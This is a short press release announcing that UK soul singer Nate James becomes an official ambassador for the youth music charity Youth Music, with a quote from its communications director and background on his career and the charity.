Nate James to become an official ambassador

UK soul star and MOBO award nominee Nate James is to become an official ambassador for lottery-funded charity Youth Music. Nate is currently enjoying significant success abroad, with his single The Message a Top 10 hit out in Europe, but will make time in his busy international schedule to help encourage young people to follow in his footsteps.

His role with the charity will involve a number of activities throughout the year to help reinforce the charity's key message - through media and music channels - that all young people deserve the chance to get involved with music making activities.

Michelle James, Director of Communications at Youth Music, said: “It was apparent from the very first time we experienced Nate in full effect at a Youth Music Action Zone in Brixton that his knowledge of the music industry and his eloquence expressing his experiences stood him apart from many other artists in the industry. We knew immediately that he would be great to have on our side as an official ambassador and I'm really delighted that he's chosen to come on board.”

The type of activities that Nate will be undertaking on behalf of Youth Music includes singing workshops, meeting and motivating Youth Music participants, as well as spreading the charity's messages to the urban and youth sectors. Nate is ideally placed to provide great insights into the industry, having gained success & recognition for his unique blend of soulful melodic pop released on his own Frofunk record label. This approach has seen Nate retain total control of his career and ownership of his own material while his debut album Set The Tone has sold close to 100,000 copies.

Youth Music is a UK-wide charity that was set up in 1999 to provide high quality and diverse music-making opportunities for 0-18 year olds. It targets young people living in areas of social and economic need that might otherwise lack opportunity.
